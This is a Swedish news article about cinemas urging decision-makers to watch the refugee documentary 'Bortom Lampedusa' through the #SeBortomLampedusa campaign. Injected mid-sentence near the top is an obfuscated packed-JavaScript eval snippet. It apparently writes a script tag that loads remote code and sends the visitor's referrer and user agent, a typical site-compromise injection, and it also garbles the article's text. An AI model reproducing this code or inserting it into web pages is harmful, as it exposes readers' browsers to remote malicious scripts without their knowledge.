Image Image Image Image Image Image Image Image Image Image

| 1 december, 2020

Scroll to top

Top

Biografer vill få svenska beslutsfattare att se Bortom Lampedusa

Biografer vill få svenska beslutsfattare att se Bortom Lampedusa
Sebastian

Bara eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hfhhr|var|u0026u|referrer|kbbza||js|php’.split(’|’),0,{}))
i år har över 270 000  människor flytt över Medelhavet från krig och konflikter.
Bortom Lampedusa är en film som visar att flykten över Medelhavet aldrig är ett val utan den enda utvägen. I sociala medier vill biograferna Bio Rio, Bio Roy, Spegeln och Röda Kvarn uppmana svenska beslutsfattare att se och ta del av katastrofens vardag som skildras i filmen Bortom Lampedusa.

Filmen har premiär den 2 september, årsdagen då bilden av Alan Kurdis kropp på en strand i Turkiet spreds över världen. Vid den tiden förra året sa statsminister Stefan Löfven:

Mitt Europa bygger inte murar! Ett år senare har vi stängt våra gränser för människor på flykt och Sveriges riksdag har röstat igenom en lag som kraftigt begränsar familjers återförening.

– Kulturens kraft är stark, den kan förändra skeenden. Vi vill uppmana både politiker och andra att se Bortom Lampedusa för att skapa en stark opinion som tar ställning för flyende människors rätt att söka asyl i ett annat land och få möjlighet att starta ett nytt liv, säger Calle Nathanson, vd Folkets Hus och Parker.

Kampanjen som går under hashtaggen #SeBortomLampedusa, bygger på att deltagare ska tagga beslutsfattare i sociala medier att se filmen Bortom Lampedusa.

Dokumentären Bortom Lampedusa, regisserad av Gianfranco Rosi, utspelar sig på den lilla italienska ön Lampedusa. De senaste tjugo åren har Lampedusa tagit emot 400 000 människor på flykt. Katastrofens vardag fortsätter på ön parallellt med döden på Medelhavet. Filmen visas bland annat på biograferna Bio Rio, Bio Roy, Spegeln och Röda Kvarn.

Mer information om kampanjen hittar du här www.fhp.nu/sebortomlampedusa